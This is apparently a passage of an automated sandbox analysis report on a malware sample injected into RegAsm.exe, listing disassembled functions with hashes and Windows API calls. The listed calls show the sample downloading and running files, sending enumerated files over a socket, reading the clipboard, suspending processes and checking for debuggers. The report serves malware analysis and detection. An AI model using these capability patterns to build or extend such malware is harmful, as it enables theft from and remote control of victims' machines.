                                                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                • String ID:
                                                                                • API String ID: 1771804793-0
                                                                                • Opcode ID: 5adf80dd010b7e34ca961d25f929f8e7600ba30a6adf491365bde7e26c19110d
                                                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                • Opcode Fuzzy Hash: 5adf80dd010b7e34ca961d25f929f8e7600ba30a6adf491365bde7e26c19110d
                                                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DownloadExecuteFileShell
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                • API String ID: 2825088817-3056885514
                                                                                • Opcode ID: c0d078bf0315f94293dc3ec17d1a86d1ef83da94f9faf21a2cb0fd5468fc728f
                                                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                • Opcode Fuzzy Hash: c0d078bf0315f94293dc3ec17d1a86d1ef83da94f9faf21a2cb0fd5468fc728f
                                                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNextsend
                                                                                • String ID: XPG$XPG
                                                                                • API String ID: 4113138495-1962359302
                                                                                • Opcode ID: 7dbd6f8b18a356aa144966577a14d72b83863f0c29c9cdf64239cb3f20770996
                                                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                • Opcode Fuzzy Hash: 7dbd6f8b18a356aa144966577a14d72b83863f0c29c9cdf64239cb3f20770996
                                                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID: p'E$JD
                                                                                • API String ID: 1084509184-908320845
                                                                                • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 2829624132-0
                                                                                • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseDataOpen
                                                                                • String ID:
                                                                                • API String ID: 2058664381-0
                                                                                • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                Function 0041BBC6 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenResume
                                                                                • String ID:
                                                                                • API String ID: 3614150671-0
                                                                                • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                Function 0041BB9A Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenSuspend
                                                                                • String ID:
                                                                                • API String ID: 1999457699-0
                                                                                • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessor
                                                                                • String ID: MZ@
                                                                                • API String ID: 2325560087-2978689999
                                                                                • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .
                                                                                • API String ID: 0-248832578
                                                                                • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .
                                                                                • API String ID: 0-248832578
                                                                                • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID: JD
                                                                                • API String ID: 1084509184-2669065882
                                                                                • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: GetLocaleInfoEx
                                                                                • API String ID: 2299586839-2904428671
                                                                                • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                Function 00451D58 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1661935332-0
                                                                                • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
